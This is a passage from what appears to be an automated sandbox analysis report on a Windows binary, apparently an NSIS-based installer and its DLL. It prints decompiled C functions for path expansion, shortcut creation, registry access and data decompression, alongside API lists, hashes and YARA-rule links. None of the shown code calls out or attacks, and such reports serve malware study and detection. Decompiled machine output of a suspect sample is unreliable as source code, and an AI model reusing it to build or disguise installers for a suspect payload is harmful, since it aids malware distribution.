					_t93 = (_t39 & 0x0000007f) << 0x00000007 | _t74 & 0x0000007f;
					_t68 = _t74;
					_t40 = _t39 | 0x00000080;
					__eflags = _t81 - 0xfe;
					_v28 = _t68;
					_v24 = _t74 | 0x00000080;
					_v16 = _t40;
					if(_t81 != 0xfe) {
						__eflags = _t81 - 0xfd;
						if(_t81 != 0xfd) {
							__eflags = _t81 - 0xff;
							if(_t81 == 0xff) {
								__eflags = (_t40 | 0xffffffff) - _t93;
								E0040594D(_t68, _t84, _t93, _t84, (_t40 | 0xffffffff) - _t93);
							}
							L41:
							_t41 = lstrlenA(_t84);
							_t73 = _a8;
							_t84 =  &(_t84[_t41]);
							_t37 = 0x42db00;
							continue;
						}
						__eflags = _t93 - 0x1d;
						if(_t93 != 0x1d) {
							__eflags = (_t93 << 0xa) + 0x42f000;
							E0040592B(_t84, (_t93 << 0xa) + 0x42f000);
						} else {
							E00405889(_t84,  *0x42eb68);
						}
						__eflags = _t93 + 0xffffffeb - 7;
						if(_t93 + 0xffffffeb < 7) {
							L32:
							E00405B89(_t84);
						}
						goto L41;
					}
					_t95 = 2;
					_t51 = GetVersion();
					__eflags = _t51;
					if(_t51 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x42ebe4;
						if( *0x42ebe4 != 0) {
							_t95 = 4;
						}
						__eflags = _t68;
						if(_t68 >= 0) {
							__eflags = _t68 - 0x25;
							if(_t68 != 0x25) {
								__eflags = _t68 - 0x24;
								if(_t68 == 0x24) {
									GetWindowsDirectoryA(_t84, 0x400);
									_t95 = 0;
								}
								while(1) {
									__eflags = _t95;
									if(_t95 == 0) {
										goto L29;
									}
									_t52 =  *0x42eb64; // 0x73e81340
									_t95 = _t95 - 1;
									__eflags = _t52;
									if(_t52 == 0) {
										L25:
										_t54 = SHGetSpecialFolderLocation( *0x42eb68,  *(_t96 + _t95 * 4 - 0x18),  &_v12);
										__eflags = _t54;
										if(_t54 != 0) {
											L27:
											 *_t84 =  *_t84 & 0x00000000;
											__eflags =  *_t84;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t84);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t54;
										if(_t54 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t56 =  *_t52( *0x42eb68,  *(_t96 + _t95 * 4 - 0x18), 0, 0, _t84);
									__eflags = _t56;
									if(_t56 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t84, 0x400);
							goto L29;
						} else {
							_t71 = (_t68 & 0x0000003f) +  *0x42eb98;
							E00405812(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t68 & 0x0000003f) +  *0x42eb98, _t84, _t68 & 0x00000040);
							__eflags =  *_t84;
							if( *_t84 != 0) {
								L30:
								__eflags = _v20 - 0x1a;
								if(_v20 == 0x1a) {
									lstrcatA(_t84, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E0040594D(_t71, _t84, _t95, _t84, _v20);
							L29:
							__eflags =  *_t84;
							if( *_t84 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t51 - 0x5a04;
					if(_t51 == 0x5a04) {
						goto L12;
					}
					__eflags = _v20 - 0x23;
					if(_v20 == 0x23) {
						goto L12;
					}
					__eflags = _v20 - 0x2e;
					if(_v20 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t84 =  *_t84 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E0040592B(_a4, _t37);
			}































                    0x0040594d
                    0x0040594d
                    0x0040594d
                    0x00405953
                    0x00405958
                    0x0040595a
                    0x00405969
                    0x00405969
                    0x0040596b
                    0x00405974
                    0x00405976
                    0x0040597b
                    0x0040597e
                    0x0040597f
                    0x00405986
                    0x00405988
                    0x0040598e
                    0x00405991
                    0x00405991
                    0x00405b66
                    0x00405b66
                    0x00405b6a
                    0x00000000
                    0x00000000
                    0x0040599e
                    0x004059a4
                    0x00000000
                    0x00000000
                    0x004059aa
                    0x004059ab
                    0x004059ae
                    0x004059b1
                    0x00405b59
                    0x00405b63
                    0x00405b65
                    0x00405b65
                    0x00405b5b
                    0x00405b5d
                    0x00405b5f
                    0x00405b60
                    0x00405b60
                    0x00000000
                    0x00405b59
                    0x004059b7
                    0x004059bb
                    0x004059c0
                    0x004059cf
                    0x004059d2
                    0x004059d4
                    0x004059d9
                    0x004059dc
                    0x004059df
                    0x004059e2
                    0x004059e5
                    0x004059e8
                    0x00405b03
                    0x00405b06
                    0x00405b36
                    0x00405b39
                    0x00405b3e
                    0x00405b42
                    0x00405b42
                    0x00405b47
                    0x00405b48
                    0x00405b4d
                    0x00405b50
                    0x00405b52
                    0x00000000
                    0x00405b52
                    0x00405b08
                    0x00405b0b
                    0x00405b20
                    0x00405b27
                    0x00405b0d
                    0x00405b14
                    0x00405b14
                    0x00405b2f
                    0x00405b32
                    0x00405afb
                    0x00405afc
                    0x00405afc
                    0x00000000
                    0x00405b32
                    0x004059f0
                    0x004059f1
                    0x004059f7
                    0x004059f9
                    0x00405a13
                    0x00405a13
                    0x00405a1a
                    0x00405a1a
                    0x00405a21
                    0x00405a25
                    0x00405a25
                    0x00405a26
                    0x00405a28
                    0x00405a61
                    0x00405a64
                    0x00405a74
                    0x00405a77
                    0x00405a7f
                    0x00405a85
                    0x00405a85
                    0x00405ae1
                    0x00405ae1
                    0x00405ae3
                    0x00000000
                    0x00000000
                    0x00405a89
                    0x00405a90
                    0x00405a91
                    0x00405a93
                    0x00405aad
                    0x00405abb
                    0x00405ac1
                    0x00405ac3
                    0x00405ade
                    0x00405ade
                    0x00405ade
                    0x00000000
                    0x00405ade
                    0x00405ac9
                    0x00405ad4
                    0x00405ada
                    0x00405adc
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00405adc
                    0x00405a95
                    0x00405a98
                    0x00000000
                    0x00000000
                    0x00405aa7
                    0x00405aa9
                    0x00405aab
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00405aab
                    0x00000000
                    0x00405ae1
                    0x00405a6c
                    0x00000000
                    0x00405a2a
                    0x00405a2f
                    0x00405a45
                    0x00405a4a
                    0x00405a4d
                    0x00405aea
                    0x00405aea
                    0x00405aee
                    0x00405af6
                    0x00405af6
                    0x00000000
                    0x00405aee
                    0x00405a57
                    0x00405ae5
                    0x00405ae5
                    0x00405ae8
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00405ae8
                    0x00405a28
                    0x004059fb
                    0x004059ff
                    0x00000000
                    0x00000000
                    0x00405a01
                    0x00405a05
                    0x00000000
                    0x00000000
                    0x00405a07
                    0x00405a0b
                    0x00000000
                    0x00405a0d
                    0x00405a0d
                    0x00000000
                    0x00405a0d
                    0x00405a0b
                    0x00405b70
                    0x00405b7a
                    0x00405b86
                    0x00405b86
                    0x00000000

                    APIs
                    • GetVersion.KERNEL32(00000000,004297B0,00000000,00404D01,004297B0,00000000), ref: 004059F1
                    • GetSystemDirectoryA.KERNEL32 ref: 00405A6C
                    • GetWindowsDirectoryA.KERNEL32(qdrjldxxem,00000400), ref: 00405A7F
                    • SHGetSpecialFolderLocation.SHELL32(?,0041F887), ref: 00405ABB
                    • SHGetPathFromIDListA.SHELL32(0041F887,qdrjldxxem), ref: 00405AC9
                    • CoTaskMemFree.OLE32(0041F887), ref: 00405AD4
                    • lstrcatA.KERNEL32(qdrjldxxem,\Microsoft\Internet Explorer\Quick Launch), ref: 00405AF6
                    • lstrlenA.KERNEL32(qdrjldxxem,00000000,004297B0,00000000,00404D01,004297B0,00000000), ref: 00405B48
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
                    • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch$qdrjldxxem
                    • API String ID: 900638850-3711807859
                    • Opcode ID: a8a3b6f7449254226430da6332d90a6f281502c7bc5fe417e028168491d755cb
                    • Instruction ID: df3d1b2a2a9ff386ea366cfb08fccb3f72b75f9b6d2186fcd2ce51f7d99f39fa
                    • Opcode Fuzzy Hash: a8a3b6f7449254226430da6332d90a6f281502c7bc5fe417e028168491d755cb
                    • Instruction Fuzzy Hash: 83510071A00A05AADF20AB65DC84BBF3BB4EB55724F14423BE911B62D0D33C6942DF5E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 10001000, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 52memoryregistryCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000008,00000010), ref: 10001008
                    • HeapAlloc.KERNEL32(00000000), ref: 1000100F
                    • RegCreateKeyExW.ADVAPI32(80000002,10000000,00000000,00000000,00000000,0002001F,00000000,-00000007,00000000), ref: 10001058
                    • GetProcessHeap.KERNEL32(00000000,00000001), ref: 10001068
                    • HeapFree.KERNEL32(00000000), ref: 1000106F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: Heap$Process$AllocCreateFree
                    • String ID: returning %p
                    • API String ID: 3034372947-1981732286
                    • Opcode ID: 696f6c78fc2ff42e68b41fd413f378f2a95a457db2cb454b327bb3ec9d1bd527
                    • Instruction ID: edeb632d065c36fcd7d74da81ee0192bee43c6a9b1077989599b8f3a27ea0a51
                    • Opcode Fuzzy Hash: 696f6c78fc2ff42e68b41fd413f378f2a95a457db2cb454b327bb3ec9d1bd527
                    • Instruction Fuzzy Hash: 3C116174A40304FFF710CF94CC49FA977B8EB49741F208048FA04AB295C6B5EE809B64
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00402012, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 134comCOMMON
                    Download Yara Rule
                    C-Code - Quality: 74%
                    			E00402012() {
				void* _t44;
				intOrPtr* _t48;
				intOrPtr* _t50;
				intOrPtr* _t52;
				intOrPtr* _t54;
				signed int _t58;
				intOrPtr* _t59;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t69;
				intOrPtr* _t71;
				int _t75;
				signed int _t81;
				intOrPtr* _t88;
				void* _t95;
				void* _t96;
				void* _t100;

				 *(_t100 - 0x30) = E004029E8(0xfffffff0);
				_t96 = E004029E8(0xffffffdf);
				 *((intOrPtr*)(_t100 - 0x2c)) = E004029E8(2);
				 *((intOrPtr*)(_t100 - 8)) = E004029E8(0xffffffcd);
				 *((intOrPtr*)(_t100 - 0x44)) = E004029E8(0x45);
				if(E0040548B(_t96) == 0) {
					E004029E8(0x21);
				}
				_t44 = _t100 + 8;
				__imp__CoCreateInstance(0x407490, _t75, 1, 0x407480, _t44);
				if(_t44 < _t75) {
					L13:
					 *((intOrPtr*)(_t100 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t48 =  *((intOrPtr*)(_t100 + 8));
					_t95 =  *((intOrPtr*)( *_t48))(_t48, 0x4074a0, _t100 - 0x34);
					if(_t95 >= _t75) {
						_t52 =  *((intOrPtr*)(_t100 + 8));
						_t95 =  *((intOrPtr*)( *_t52 + 0x50))(_t52, _t96);
						_t54 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t54 + 0x24))(_t54, "C:\\Users\\hardz\\AppData\\Local\\Temp");
						_t81 =  *(_t100 - 0x14);
						_t58 = _t81 >> 0x00000008 & 0x000000ff;
						if(_t58 != 0) {
							_t88 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t88 + 0x3c))(_t88, _t58);
							_t81 =  *(_t100 - 0x14);
						}
						_t59 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t59 + 0x34))(_t59, _t81 >> 0x10);
						if( *((intOrPtr*)( *((intOrPtr*)(_t100 - 8)))) != _t75) {
							_t71 =  *((intOrPtr*)(_t100 + 8));
							 *((intOrPtr*)( *_t71 + 0x44))(_t71,  *((intOrPtr*)(_t100 - 8)),  *(_t100 - 0x14) & 0x000000ff);
						}
						_t62 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t62 + 0x2c))(_t62,  *((intOrPtr*)(_t100 - 0x2c)));
						_t64 =  *((intOrPtr*)(_t100 + 8));
						 *((intOrPtr*)( *_t64 + 0x1c))(_t64,  *((intOrPtr*)(_t100 - 0x44)));
						if(_t95 >= _t75) {
							_t95 = 0x80004005;
							if(MultiByteToWideChar(_t75, _t75,  *(_t100 - 0x30), 0xffffffff, 0x409370, 0x400) != 0) {
								_t69 =  *((intOrPtr*)(_t100 - 0x34));
								_t95 =  *((intOrPtr*)( *_t69 + 0x18))(_t69, 0x409370, 1);
							}
						}
						_t66 =  *((intOrPtr*)(_t100 - 0x34));
						 *((intOrPtr*)( *_t66 + 8))(_t66);
					}
					_t50 =  *((intOrPtr*)(_t100 + 8));
					 *((intOrPtr*)( *_t50 + 8))(_t50);
					if(_t95 >= _t75) {
						_push(0xfffffff4);
					} else {
						goto L13;
					}
				}
				E00401423();
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t100 - 4));
				return 0;
			}





















                    0x0040201b
                    0x00402025
                    0x0040202e
                    0x00402038
                    0x00402041
                    0x0040204b
                    0x0040204f
                    0x0040204f
                    0x00402054
                    0x00402065
                    0x0040206d
                    0x0040214d
                    0x0040214d
                    0x00402154
                    0x00402073
                    0x00402073
                    0x00402084
                    0x00402088
                    0x0040208e
                    0x00402098
                    0x0040209a
                    0x004020a5
                    0x004020a8
                    0x004020b5
                    0x004020b7
                    0x004020b9
                    0x004020c0
                    0x004020c3
                    0x004020c3
                    0x004020c6
                    0x004020d0
                    0x004020d8
                    0x004020dd
                    0x004020e9
                    0x004020e9
                    0x004020ec
                    0x004020f5
                    0x004020f8
                    0x00402101
                    0x00402106
                    0x00402118
                    0x00402127
                    0x00402129
                    0x00402135
                    0x00402135
                    0x00402127
                    0x00402137
                    0x0040213d
                    0x0040213d
                    0x00402140
                    0x00402146
                    0x0040214b
                    0x00402160
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040214b
                    0x00402156
                    0x00402880
                    0x0040288c

                    APIs
                    • CoCreateInstance.OLE32(00407490,?,00000001,00407480,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402065
                    • MultiByteToWideChar.KERNEL32(?,?,?,000000FF,00409370,00000400,?,00000001,00407480,?,00000000,00000045,000000CD,00000002,000000DF,000000F0), ref: 0040211F
                    Strings
                    • C:\Users\user\AppData\Local\Temp, xrefs: 0040209D
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: ByteCharCreateInstanceMultiWide
                    • String ID: C:\Users\user\AppData\Local\Temp
                    • API String ID: 123533781-501415292
                    • Opcode ID: 2ca65707f57f31f88cc6a7fd1c1688d70cf0f88a2c7737c03cbde538d7105c3f
                    • Instruction ID: 24f6ed1ac1c0c168ca35b22597f39d8cd9e85fbc7861a3d68fdd8e416dd3802a
                    • Opcode Fuzzy Hash: 2ca65707f57f31f88cc6a7fd1c1688d70cf0f88a2c7737c03cbde538d7105c3f
                    • Instruction Fuzzy Hash: E2414DB5A00104AFCB00DFA4CD89E9E7BB9EF49354B20416AF505EB2E1DA79ED41CB64
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 1000EE31, Relevance: 3.0, APIs: 2, Instructions: 8COMMON
                    Download Yara Rule
                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(00000000,?,1000DD94,?,?,?,?), ref: 1000EE36
                    • UnhandledExceptionFilter.KERNEL32(?,?,?,?), ref: 1000EE3F
                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: a375a81c7ef1df14eea1922e879cb2e9f968cf6583de0dea8f14c4e18be49aa6
                    • Instruction ID: b090f88d11f7799a5d4f9b5517e089a18a004c10ac5bbc581c9ad52cab87e145
                    • Opcode Fuzzy Hash: a375a81c7ef1df14eea1922e879cb2e9f968cf6583de0dea8f14c4e18be49aa6
                    • Instruction Fuzzy Hash: 0FB09232044218EBEB422FD1DC49B583FA9EB0E7A2F00C010F60E44060CB7294909AA2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00402630, Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                    Download Yara Rule
                    C-Code - Quality: 39%
                    			E00402630(char __ebx, char* __edi, char* __esi) {
				void* _t19;

				if(FindFirstFileA(E004029E8(2), _t19 - 0x1a4) != 0xffffffff) {
					E00405889(__edi, _t6);
					_push(_t19 - 0x178);
					_push(__esi);
					E0040592B();
				} else {
					 *__edi = __ebx;
					 *__esi = __ebx;
					 *((intOrPtr*)(_t19 - 4)) = 1;
				}
				 *0x42ebe8 =  *0x42ebe8 +  *((intOrPtr*)(_t19 - 4));
				return 0;
			}




                    0x00402648
                    0x0040265c
                    0x00402667
                    0x00402668
                    0x004027a3
                    0x0040264a
                    0x0040264a
                    0x0040264c
                    0x0040264e
                    0x0040264e
                    0x00402880
                    0x0040288c

                    APIs
                    • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 0040263F
                    Memory Dump Source
                    • Source File: 00000000.00000002.293500532.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.293492940.0000000000400000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293514085.0000000000407000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293540080.0000000000409000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.293963975.000000000042C000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294066816.0000000000434000.00000004.00020000.sdmp Download File
                    • Associated: 00000000.00000002.294188478.0000000000437000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID: FileFindFirst
                    • String ID:
                    • API String ID: 1974802433-0
                    • Opcode ID: 0eff392dd80b659ea035236535e3ff8102da578794157fa10522713e52998ada
                    • Instruction ID: 00d369c81b6f5d5ac2b66fc3ece6c10e84ddf32e85f5a3588956fe302b8fe543
                    • Opcode Fuzzy Hash: 0eff392dd80b659ea035236535e3ff8102da578794157fa10522713e52998ada
                    • Instruction Fuzzy Hash: 18F0A0726081009EE700EBB59949EFEB768DF21324F6045BBF111B20C1C3B88946DA2A
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 1000D1BC, Relevance: .3, Instructions: 345COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                    • Instruction ID: a0260415576aa95420f372983f58743769c0d120ca382f52acd45fed0c32641d
                    • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                    • Instruction Fuzzy Hash: 2AC15E322095930AEB5DD779843453EBEE29BA26F1317076FD8B2CB1D8FF20D5649620
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 1000D5F1, Relevance: .3, Instructions: 341COMMON
                    Download Yara Rule
                    Memory Dump Source
                    • Source File: 00000000.00000002.295319398.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000000.00000002.295306165.0000000010000000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295336488.000000001001A000.00000002.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295348075.000000001001F000.00000040.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295361076.0000000010020000.00000080.00020000.sdmp Download File
                    • Associated: 00000000.00000002.295373234.0000000010021000.00000002.00020000.sdmp Download File
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                    • Instruction ID: 4a76e1c1ec7b5ebfa9efd7cb76e824ac0a7efc52ddd2614d983c74fda7de632f
                    • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                    • Instruction Fuzzy Hash: A4C150322095930AEB5DD779843453EBEE29BA26F1317076ED8B2CB1D8FF20C524D620
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00406043, Relevance: .3, Instructions: 334COMMONCrypto
                    Download Yara Rule
                    C-Code - Quality: 79%
                    			E00406043(signed int __ebx, signed int* __esi) {
				signed int _t396;
				signed int _t425;
				signed int _t442;
				signed int _t443;
				signed int* _t446;
				void* _t448;

				L0:
				while(1) {
					L0:
					_t446 = __esi;
					_t425 = __ebx;
					if( *(_t448 - 0x34) == 0) {
						break;
					}
					L55:
					__eax =  *(__ebp - 0x38);
					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
					__ecx = __ebx;
					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
					__ebx = __ebx + 8;
					while(1) {
						L56:
						if(__ebx < 0xe) {
							goto L0;
						}
						L57:
						__eax =  *(__ebp - 0x40);
						__eax =  *(__ebp - 0x40) & 0x00003fff;
						__ecx = __eax;
						__esi[1] = __eax;
						__ecx = __eax & 0x0000001f;
						if(__cl > 0x1d) {
							L9:
							_t443 = _t442 | 0xffffffff;
							 *_t446 = 0x11;
							L10:
							_t446[0x147] =  *(_t448 - 0x40);
							_t446[0x146] = _t425;
							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
							L11:
							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
							_t446[0x26ea] =  *(_t448 - 0x30);
							E004067B2( *(_t448 + 8));
							return _t443;
						}
						L58:
						__eax = __eax & 0x000003e0;
						if(__eax > 0x3a0) {
							goto L9;
						}
						L59:
						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
						__ebx = __ebx - 0xe;
						_t94 =  &(__esi[2]);
						 *_t94 = __esi[2] & 0x00000000;
						 *__esi = 0xc;
						while(1) {
							L60:
							__esi[1] = __esi[1] >> 0xa;
							__eax = (__esi[1] >> 0xa) + 4;
							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
								goto L68;
							}
							L61:
							while(1) {
								L64:
								if(__ebx >= 3) {
									break;
								}
								L62:
								if( *(__ebp - 0x34) == 0) {
									goto L182;
								}
								L63:
								__eax =  *(__ebp - 0x38);
								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
								__ecx = __ebx;
								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
								__ebx = __ebx + 8;
							}
							L65:
							__ecx = __esi[2];
							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
							__ebx = __ebx - 3;
							_t108 = __ecx + 0x407374; // 0x121110
							__ecx =  *_t108;
							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
							__ecx = __esi[1];
							__esi[2] = __esi[2] + 1;
							__eax = __esi[2];
							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
								goto L64;
							}
							L66:
							while(1) {
								L68:
								if(__esi[2] >= 0x13) {
									break;
								}
								L67:
								_t119 = __esi[2] + 0x407374; // 0x4000300
								__eax =  *_t119;
								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
								_t126 =  &(__esi[2]);
								 *_t126 = __esi[2] + 1;
							}
							L69:
							__ecx = __ebp - 8;
							__edi =  &(__esi[0x143]);
							 &(__esi[0x148]) =  &(__esi[0x144]);
							__eax = 0;
							 *(__ebp - 8) = 0;
							__eax =  &(__esi[3]);
							 *__edi = 7;
							__eax = E0040681A( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
							if(__eax != 0) {
								L72:
								 *__esi = 0x11;
								while(1) {
									L180:
									_t396 =  *_t446;
									if(_t396 > 0xf) {
										break;
									}
									L1:
									switch( *((intOrPtr*)(_t396 * 4 +  &M00406772))) {
										case 0:
											L101:
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[5];
											__esi[2] = __esi[5];
											 *__esi = 1;
											goto L102;
										case 1:
											L102:
											__eax = __esi[3];
											while(1) {
												L105:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L103:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L104:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L106:
											__eax =  *(0x409340 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __ecx;
											if(__ecx != 0) {
												L108:
												__eflags = __cl & 0x00000010;
												if((__cl & 0x00000010) == 0) {
													L110:
													__eflags = __cl & 0x00000040;
													if((__cl & 0x00000040) == 0) {
														goto L125;
													}
													L111:
													__eflags = __cl & 0x00000020;
													if((__cl & 0x00000020) == 0) {
														goto L9;
													}
													L112:
													 *__esi = 7;
													goto L180;
												}
												L109:
												__esi[2] = __ecx;
												__esi[1] = __eax;
												 *__esi = 2;
												goto L180;
											}
											L107:
											__esi[2] = __eax;
											 *__esi = 6;
											goto L180;
										case 2:
											L113:
											__eax = __esi[2];
											while(1) {
												L116:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L114:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L115:
												__ecx =  *(__ebp - 0x38);
